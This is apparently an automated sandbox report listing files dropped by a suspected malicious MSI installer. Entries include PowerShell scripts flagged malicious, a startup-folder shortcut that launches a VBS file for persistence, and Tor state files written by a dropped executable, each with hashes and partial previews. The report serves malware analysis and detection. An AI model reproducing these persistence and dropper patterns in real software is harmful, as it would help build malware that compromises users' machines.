                                                Preview: .... Directory: C:\......Mode LastWriteTime Length Name ..---- ------------- ------ ---- ..d----- 11/23/2021 9:01 PM JQHPQS ......
                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ahzy01y.me5.psm1
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: 1
                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c40vmdzw.5rz.psm1
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: 1
                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o1x1xcgg.tti.psm1
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: 1
                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ozbu0pkk.1qs.ps1
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: 1
                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wddzedzb.jra.ps1
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: 1
                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zadk52ls.jtp.ps1
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: 1
                                                C:\Users\user\AppData\Local\Temp\pssFF45.ps1
                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                Category:dropped
                                                Size (bytes):5552
                                                Entropy (8bit):3.485945251159994
                                                Encrypted:false
                                                SSDEEP:96:5wb5jTmmywV2BVrIovmkitxcj6BngOcvjb:5wbdTif/nsyvb
                                                MD5:0C95BC11CFCA37F84A19DE0529377E13
                                                SHA1:41F409DBBAB04EF35C4F6489AF6F85FCEB9C501A
                                                SHA-256:88748AAE11029228D84AEF0855F4BC084DFD70450DB1F7029746D8BC85182F93
                                                SHA-512:8A52F3C40440E3129A367609EE4B6E9E98AA62EDEC48592BE03BAD1AADCD389E2E58E095F4EA3D6F9CB458AA7101FCB5AFDFF66658885BFA0634C74C086DB568
                                                Malicious:true
                                                Reputation:unknown
                                                Preview: ..p.a.r.a.m.(..... . .[.a.l.i.a.s.(.".p.r.o.p.F.i.l.e.".).]. . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.O.u.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".p.r.o.p.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.K.V.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.F.i.l.e.".).]. . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.A.r.g.s.F.i.l.e.".).].[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.f.a.l.s.e.).].[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.A.r.g.s.F.i.l.e.P.a.t.h..... .,.[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. . . . . . . . . . . . . . . . . . . . . . . . . . .[.s.t.r.i.n.g.]. .$.t.e.s.t.P.r.e.f.i.x..... .,.[.s.w.i.t.c.h.]. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                C:\Users\user\AppData\Local\Temp\scrFDAC.ps1
                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                Category:dropped
                                                Size (bytes):5314
                                                Entropy (8bit):3.6960003697052586
                                                Encrypted:false
                                                SSDEEP:96:opXTY2ZYIR8QbMjerGuvX9+77vBNCfzD9C0MVgQ0H8W0xI2tHSv/D2:8TY2Zb8Qw0GuV+3vrgagQ+f0xRSXi
                                                MD5:760083834CE1D1B1FFA7D4134702EF37
                                                SHA1:4ACDC74FC95959FCCD939F4B76ED34361B378DAF
                                                SHA-256:82D84ADFABC02FEDB06911B370215B382BB6F21998F65971FFD454B1C9A2BAC9
                                                SHA-512:C6C65AE003984538AC166A91D51EC4871781DD36D84D0D360880950C72504D2A8BFD80A339D1BD898F4BE4BAAC11B3029333195DA8CD6890A087126E1104E9FF
                                                Malicious:true
                                                Reputation:unknown
                                                Preview: ..<.#.......N.O.T.E.S..... . .".p.w.s.h...e.x.e.". .i.s. .r.u.n. .i.f. .r.e.q.u.i.r.e.d. .v.e.r.s.i.o.n. .i.s. .g.r.e.a.t.e.r. .o.r. .e.q.u.a.l. .t.o. .6.,. .o.t.h.e.r.w.i.s.e..... . .".p.o.w.e.r.s.h.e.l.l...e.x.e.". .i.s. .i.n.v.o.k.e.d. .b.y. .d.e.f.a.u.l.t.....#.>.........#.R.e.q.u.i.r.e.s. .-.v.e.r.s.i.o.n. .3.....P.a.r.a.m.(.$.c.u.r.r.e.n.t.P.a.t.h.).........#. .y.o.u.r. .c.o.d.e. .g.o.e.s. .h.e.r.e.........A.d.d.-.T.y.p.e. .-.A.s.s.e.m.b.l.y.N.a.m.e. .S.y.s.t.e.m...W.e.b.........#.........$.t.e.s.t.P.a.t.h. .=. .".$.(.$.e.n.v.:.P.r.o.g.r.a.m.D.a.t.a.).\.7.a.2.6.0.4.2.0.".........i.f. .(.T.e.s.t.-.P.a.t.h. .-.P.a.t.h. .$.t.e.s.t.P.a.t.h.). .{.......b.r.e.a.k.....}.........".". .|. .S.e.t.-.C.o.n.t.e.n.t. .-.P.a.t.h. .$.t.e.s.t.P.a.t.h.........#.........f.u.n.c.t.i.o.n. .r.a.n.d.o.m.S.t.r. .{.......$.c.h.a.r.s. .=. .".A.B.C.D.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U.V.W.X.Y.Z."...T.o.C.h.a.r.A.r.r.a.y.(.).......$.r.e.s.u.l.t. .=. .".".............f.o.r.(.$.i. .=. .0.;.$.i. .-.l.t. .6.;.$.
                                                C:\Users\user\AppData\Local\Temp\scrFDAD.txt
                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                Category:dropped
                                                Size (bytes):72
                                                Entropy (8bit):3.143682868530171
                                                Encrypted:false
                                                SSDEEP:3:Qx5RvONqMblM6lEjl5KMEXl:Qx5M8MbhEZwMa
                                                MD5:231A4DEF0C4E7AB318D964246B8417B4
                                                SHA1:02E900406D9F913040682F8E83F68B00FC3AAC11
                                                SHA-256:B6C34669E9F67FC15E4EAB22269E76A853E054E9F77AF89F226307924334CB49
                                                SHA-512:0ABE90F4B86A2B746862AA9BED6A3BFD99D028896D69F54CC486EF80AD446202AB60D50B7F2CBFDE59DA040D778FB0C2204A70064BBF0F54697F0DE6A4C91CC8
                                                Malicious:true
                                                Reputation:unknown
                                                Preview: ..-.c.u.r.r.e.n.t.P.a.t.h. .C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.\.L.e.i.t.o.r.
                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\upspur.lnk
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed Nov 24 04:01:27 2021, mtime=Wed Nov 24 04:01:28 2021, atime=Wed Nov 24 04:01:28 2021, length=241, window=hidenormalshowminimized
                                                Category:dropped
                                                Size (bytes):651
                                                Entropy (8bit):4.463336300911097
                                                Encrypted:false
                                                SSDEEP:12:8mB1RAzkkRhQK8THK/3JjAYkL//rV4om:8mBFkbmHKvtAYkLbBm
                                                MD5:D5E66EA9B54ABB2D24052ED7EC975969
                                                SHA1:3C01BF83DC6B5AF0264FE91F240F80B0094BE07B
                                                SHA-256:F7EF586DD9F9CD9CB2414D33A6146A42C9DFE87470281DEBE24C4DE7A509DE60
                                                SHA-512:24653BFE9DCC3DCFD55D21B2AAA0D90C59CD9F4922692DCABC22D59DDA36A461BE6539B3523BD3ECE50A5CFC480B07836336F00A45DE54D072856A69C0677205
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: L..................F.... ....cfV....\.V....\.V.................................P.O. .:i.....+00.../C:\...................T.1.....xS-(..JQHPQS..>......xS'(xS-(..../......................F4.J.Q.H.P.Q.S.....`.2.....xS/( .ECSGNO.vbs..F......xS.(xS/(..............................E.C.S.G.N.O...v.b.s.......C...............-.......B............V.......C:\JQHPQS\ECSGNO.vbs..,.....\.....\.....\.....\.....\.....\.....\.....\.....\.J.Q.H.P.Q.S.\.E.C.S.G.N.O...v.b.s...C.:.\.J.Q.H.P.Q.S.`.......X.......138727...........!a..%.H.VZAj...@ot.+........W...!a..%.H.VZAj...@ot.+........W..E.......9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                C:\Users\user\AppData\Roaming\tor\cached-certs (copy)
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):20883
                                                Entropy (8bit):6.052304502917292
                                                Encrypted:false
                                                SSDEEP:384:hd24NVjI1h17bJq2q4OVpd1hG9h4VQV01h2p1ZdMY4mVq1hpG5E10IU4mV91hCRb:b2UWx7NS/9KHLWSHhvA05EC3jneRD4d4
                                                MD5:8AD793E9C375319EA1F7F198D49D5D2F
                                                SHA1:64E2C4AB116B7175A6155263ECABEDB495DE42A8
                                                SHA-256:90521ECFFB9C401F86A05F2CF36705C84750C87F3F9C163942C16348278128EA
                                                SHA-512:B175B71897C83B42973BA7A28730BC841A2BA6E149815E2055FA7CD070E7C8BE8FB7A08BE09D217BF3BA33E8BBEFE83E67A35D9586A0F163844B0F019646E50D
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: dir-key-certificate-version 3..fingerprint ED03BB616EB2F60BEC80151114BB25CEF515B226..dir-key-published 2021-03-29 03:27:58..dir-key-expires 2022-03-29 03:27:58..dir-identity-key..
                                                C:\Users\user\AppData\Roaming\tor\cached-certs.tmp
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):20883
                                                Entropy (8bit):6.052304502917292
                                                Encrypted:false
                                                SSDEEP:384:hd24NVjI1h17bJq2q4OVpd1hG9h4VQV01h2p1ZdMY4mVq1hpG5E10IU4mV91hCRb:b2UWx7NS/9KHLWSHhvA05EC3jneRD4d4
                                                MD5:8AD793E9C375319EA1F7F198D49D5D2F
                                                SHA1:64E2C4AB116B7175A6155263ECABEDB495DE42A8
                                                SHA-256:90521ECFFB9C401F86A05F2CF36705C84750C87F3F9C163942C16348278128EA
                                                SHA-512:B175B71897C83B42973BA7A28730BC841A2BA6E149815E2055FA7CD070E7C8BE8FB7A08BE09D217BF3BA33E8BBEFE83E67A35D9586A0F163844B0F019646E50D
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: dir-key-certificate-version 3..fingerprint ED03BB616EB2F60BEC80151114BB25CEF515B226..dir-key-published 2021-03-29 03:27:58..dir-key-expires 2022-03-29 03:27:58..dir-identity-key..
                                                C:\Users\user\AppData\Roaming\tor\cached-microdesc-consensus (copy)
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:ASCII text, with very long lines
                                                Category:dropped
                                                Size (bytes):2175813
                                                Entropy (8bit):5.623200040786907
                                                Encrypted:false
                                                SSDEEP:12288:8QKoJWc9DfsFwnNfBWMjxiZEluWY7KG+kR+LcJ+AfXiIgU+0:8QKoJWADKQNfLoZ0e7v0cUC+0
                                                MD5:FB3D3CAADE1A3BAAAFB0FB3F07BE0A4D
                                                SHA1:CDE7AFAB2C9F9732C60329858885CB9F62C6B8AC
                                                SHA-256:2B9AC369D38326F1D603D6C37D0E6DAE9EDA69B7C13553142D9F15616E249937
                                                SHA-512:2E0328859E081D0CB6AB2E07E064E42C203AD9C7DD712268C3415C159DB0E9F9DE31C2F38F72E553ED15EA5E175D0F657A7CF3A3E9830D5DC1EBF2DABAFB7E07
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: network-status-version 3 microdesc.vote-status consensus.consensus-method 31.valid-after 2021-11-23 19:00:00.fresh-until 2021-11-23 20:00:00.valid-until 2021-11-23 22:00:00.voting-delay 300 300.client-versions 0.3.5.10,0.3.5.11,0.3.5.12,0.3.5.13,0.3.5.14,0.3.5.15,0.3.5.16,0.3.5.17,0.4.5.1-alpha,0.4.5.2-alpha,0.4.5.3-rc,0.4.5.4-rc,0.4.5.5-rc,0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.6.1-alpha,0.4.6.2-alpha,0.4.6.3-rc,0.4.6.4-rc,0.4.6.5,0.4.6.6,0.4.6.7,0.4.6.8,0.4.7.1-alpha,0.4.7.2-alpha.server-versions 0.3.5.10,0.3.5.11,0.3.5.12,0.3.5.13,0.3.5.14,0.3.5.15,0.3.5.16,0.3.5.17,0.4.5.1-alpha,0.4.5.2-alpha,0.4.5.3-rc,0.4.5.4-rc,0.4.5.5-rc,0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.6.1-alpha,0.4.6.2-alpha,0.4.6.3-rc,0.4.6.4-rc,0.4.6.5,0.4.6.6,0.4.6.7,0.4.6.8,0.4.7.1-alpha,0.4.7.2-alpha.known-flags Authority BadExit Exit Fast Guard HSDir NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=
                                                C:\Users\user\AppData\Roaming\tor\cached-microdesc-consensus.tmp
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:ASCII text, with very long lines
                                                Category:dropped
                                                Size (bytes):2175813
                                                Entropy (8bit):5.623200040786907
                                                Encrypted:false
                                                SSDEEP:12288:8QKoJWc9DfsFwnNfBWMjxiZEluWY7KG+kR+LcJ+AfXiIgU+0:8QKoJWADKQNfLoZ0e7v0cUC+0
                                                MD5:FB3D3CAADE1A3BAAAFB0FB3F07BE0A4D
                                                SHA1:CDE7AFAB2C9F9732C60329858885CB9F62C6B8AC
                                                SHA-256:2B9AC369D38326F1D603D6C37D0E6DAE9EDA69B7C13553142D9F15616E249937
                                                SHA-512:2E0328859E081D0CB6AB2E07E064E42C203AD9C7DD712268C3415C159DB0E9F9DE31C2F38F72E553ED15EA5E175D0F657A7CF3A3E9830D5DC1EBF2DABAFB7E07
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: network-status-version 3 microdesc.vote-status consensus.consensus-method 31.valid-after 2021-11-23 19:00:00.fresh-until 2021-11-23 20:00:00.valid-until 2021-11-23 22:00:00.voting-delay 300 300.client-versions 0.3.5.10,0.3.5.11,0.3.5.12,0.3.5.13,0.3.5.14,0.3.5.15,0.3.5.16,0.3.5.17,0.4.5.1-alpha,0.4.5.2-alpha,0.4.5.3-rc,0.4.5.4-rc,0.4.5.5-rc,0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.6.1-alpha,0.4.6.2-alpha,0.4.6.3-rc,0.4.6.4-rc,0.4.6.5,0.4.6.6,0.4.6.7,0.4.6.8,0.4.7.1-alpha,0.4.7.2-alpha.server-versions 0.3.5.10,0.3.5.11,0.3.5.12,0.3.5.13,0.3.5.14,0.3.5.15,0.3.5.16,0.3.5.17,0.4.5.1-alpha,0.4.5.2-alpha,0.4.5.3-rc,0.4.5.4-rc,0.4.5.5-rc,0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.6.1-alpha,0.4.6.2-alpha,0.4.6.3-rc,0.4.6.4-rc,0.4.6.5,0.4.6.6,0.4.6.7,0.4.6.8,0.4.7.1-alpha,0.4.7.2-alpha.known-flags Authority BadExit Exit Fast Guard HSDir NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=
                                                C:\Users\user\AppData\Roaming\tor\cached-microdescs.new
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:ASCII text, with very long lines
                                                Category:dropped
                                                Size (bytes):2139555
                                                Entropy (8bit):5.343596712207728
                                                Encrypted:false
                                                SSDEEP:24576:j8j/CAwCUzKKoyTkkkguxFaeVSoQa26HQHBSztL6fDkQ3RKkxLtGI9/r2vBdutfW:V1k6gCkx
                                                MD5:40B913D150ED2FF16F55281CBA83FB55
                                                SHA1:6899B0C5AFE273645833F0BF2C50F37A7BB12A55
                                                SHA-256:6AD935A2C560B7A6D180E5F472816AD2AD356FA181F22D80B7FEC099899F1087
                                                SHA-512:2A31FDEA74862662F40B655252E3842A47E75145B60663B4761EC1635BDD603518F69143E68787E983D79483315302B7891ABCBF663C7271DF667984B6DD5D75
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Roaming\tor\state (copy)
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):3454
                                                Entropy (8bit):5.296213116970063
                                                Encrypted:false
                                                SSDEEP:48:c4CFUNGIg7ZH8hz+bkLpXkAMs/Cr8z3nkWeTqvlcEtyIugIdOWXu:3+UAlR8hzrLNkALS8zXWTGchIupdOqu
                                                MD5:F55CDB55BE895D0DD3A235F0C02615E4
                                                SHA1:A5109324F9EC9903062EEC66EDB24CADBDBF9A7E
                                                SHA-256:A01C29D77F6A367A2CC223D8E7872C1C17EA23F637AE70ACA8C805789C295BB3
                                                SHA-512:FDDA1E19B9D8729F3503536DFAB2A1E2F3FE2EA8270E835407253C3E9143637516E5D5E696EE339C2B42B09F30F99467718436297CE0F2C7CB08EC0F03B59789
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: # Tor state file last generated on 2021-11-23 21:02:19 local time..# Other times below are in UTC..# You *do not* need to edit this file.....Dormant 0..Guard in=default rsa_id=F1E87923D9A29DE6C42B60441EBD17F8DE1D4AF4 nickname=NiceGuy sampled_on=2021-11-16T13:23:24 sampled_idx=0 sampled_by=0.4.5.9 listed=1..Guard in=default rsa_id=CC2179A97D4EC55BFA56B27F2300C53162CEBB6E nickname=Assange019de sampled_on=2021-11-23T07:14:58 sampled_idx=1 sampled_by=0.4.5.9 listed=1 confirmed_on=2021-11-16T10:03:13 confirmed_idx=0..Guard in=default rsa_id=7778BBD947C2A5543120891C78F9E4EAE2D2B908 nickname=UnredactedTelecomix sampled_on=2021-11-17T06:19:30 sampled_idx=2 sampled_by=0.4.5.9 listed=1..Guard in=default rsa_id=8927AD37F39D10C3F4CFDD5213606E4881CCF6B0 nickname=tirz sampled_on=2021-11-18T09:27:26 sampled_idx=3 sampled_by=0.4.5.9 listed=1..Guard in=default rsa_id=4E052ABD8C5D4219C4519540DC0C91B21AFB8FC5 nickname=bouncer4u sampled_on=2021-11-15T21:14:41 sampled_idx=4 sampled_by=0.4.5.9 listed=1..Gua
                                                C:\Users\user\AppData\Roaming\tor\state.tmp
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):3454
                                                Entropy (8bit):5.296213116970063
                                                Encrypted:false
                                                SSDEEP:48:c4CFUNGIg7ZH8hz+bkLpXkAMs/Cr8z3nkWeTqvlcEtyIugIdOWXu:3+UAlR8hzrLNkALS8zXWTGchIupdOqu
                                                MD5:F55CDB55BE895D0DD3A235F0C02615E4
                                                SHA1:A5109324F9EC9903062EEC66EDB24CADBDBF9A7E
                                                SHA-256:A01C29D77F6A367A2CC223D8E7872C1C17EA23F637AE70ACA8C805789C295BB3
                                                SHA-512:FDDA1E19B9D8729F3503536DFAB2A1E2F3FE2EA8270E835407253C3E9143637516E5D5E696EE339C2B42B09F30F99467718436297CE0F2C7CB08EC0F03B59789
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: # Tor state file last generated on 2021-11-23 21:02:19 local time..# Other times below are in UTC..# You *do not* need to edit this file.....Dormant 0..Guard in=default rsa_id=F1E87923D9A29DE6C42B60441EBD17F8DE1D4AF4 nickname=NiceGuy sampled_on=2021-11-16T13:23:24 sampled_idx=0 sampled_by=0.4.5.9 listed=1..Guard in=default rsa_id=CC2179A97D4EC55BFA56B27F2300C53162CEBB6E nickname=Assange019de sampled_on=2021-11-23T07:14:58 sampled_idx=1 sampled_by=0.4.5.9 listed=1 confirmed_on=2021-11-16T10:03:13 confirmed_idx=0..Guard in=default rsa_id=7778BBD947C2A5543120891C78F9E4EAE2D2B908 nickname=UnredactedTelecomix sampled_on=2021-11-17T06:19:30 sampled_idx=2 sampled_by=0.4.5.9 listed=1..Guard in=default rsa_id=8927AD37F39D10C3F4CFDD5213606E4881CCF6B0 nickname=tirz sampled_on=2021-11-18T09:27:26 sampled_idx=3 sampled_by=0.4.5.9 listed=1..Guard in=default rsa_id=4E052ABD8C5D4219C4519540DC0C91B21AFB8FC5 nickname=bouncer4u sampled_on=2021-11-15T21:14:41 sampled_idx=4 sampled_by=0.4.5.9 listed=1..Gua
                                                C:\Users\user\AppData\Roaming\tor\unverified-microdesc-consensus (copy)
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:ASCII text, with very long lines
                                                Category:dropped
                                                Size (bytes):2175813
                                                Entropy (8bit):5.623200040786907
                                                Encrypted:false
                                                SSDEEP:12288:8QKoJWc9DfsFwnNfBWMjxiZEluWY7KG+kR+LcJ+AfXiIgU+0:8QKoJWADKQNfLoZ0e7v0cUC+0
                                                MD5:FB3D3CAADE1A3BAAAFB0FB3F07BE0A4D
                                                SHA1:CDE7AFAB2C9F9732C60329858885CB9F62C6B8AC
                                                SHA-256:2B9AC369D38326F1D603D6C37D0E6DAE9EDA69B7C13553142D9F15616E249937
                                                SHA-512:2E0328859E081D0CB6AB2E07E064E42C203AD9C7DD712268C3415C159DB0E9F9DE31C2F38F72E553ED15EA5E175D0F657A7CF3A3E9830D5DC1EBF2DABAFB7E07
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: network-status-version 3 microdesc.vote-status consensus.consensus-method 31.valid-after 2021-11-23 19:00:00.fresh-until 2021-11-23 20:00:00.valid-until 2021-11-23 22:00:00.voting-delay 300 300.client-versions 0.3.5.10,0.3.5.11,0.3.5.12,0.3.5.13,0.3.5.14,0.3.5.15,0.3.5.16,0.3.5.17,0.4.5.1-alpha,0.4.5.2-alpha,0.4.5.3-rc,0.4.5.4-rc,0.4.5.5-rc,0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.6.1-alpha,0.4.6.2-alpha,0.4.6.3-rc,0.4.6.4-rc,0.4.6.5,0.4.6.6,0.4.6.7,0.4.6.8,0.4.7.1-alpha,0.4.7.2-alpha.server-versions 0.3.5.10,0.3.5.11,0.3.5.12,0.3.5.13,0.3.5.14,0.3.5.15,0.3.5.16,0.3.5.17,0.4.5.1-alpha,0.4.5.2-alpha,0.4.5.3-rc,0.4.5.4-rc,0.4.5.5-rc,0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.6.1-alpha,0.4.6.2-alpha,0.4.6.3-rc,0.4.6.4-rc,0.4.6.5,0.4.6.6,0.4.6.7,0.4.6.8,0.4.7.1-alpha,0.4.7.2-alpha.known-flags Authority BadExit Exit Fast Guard HSDir NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=
                                                C:\Users\user\AppData\Roaming\tor\unverified-microdesc-consensus.tmp
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:ASCII text, with very long lines
                                                Category:dropped
                                                Size (bytes):2175813
                                                Entropy (8bit):5.623200040786907
                                                Encrypted:false
                                                SSDEEP:12288:8QKoJWc9DfsFwnNfBWMjxiZEluWY7KG+kR+LcJ+AfXiIgU+0:8QKoJWADKQNfLoZ0e7v0cUC+0
                                                MD5:FB3D3CAADE1A3BAAAFB0FB3F07BE0A4D
                                                SHA1:CDE7AFAB2C9F9732C60329858885CB9F62C6B8AC
                                                SHA-256:2B9AC369D38326F1D603D6C37D0E6DAE9EDA69B7C13553142D9F15616E249937
                                                SHA-512:2E0328859E081D0CB6AB2E07E064E42C203AD9C7DD712268C3415C159DB0E9F9DE31C2F38F72E553ED15EA5E175D0F657A7CF3A3E9830D5DC1EBF2DABAFB7E07
                                                Malicious:false
                                                Reputation:unknown
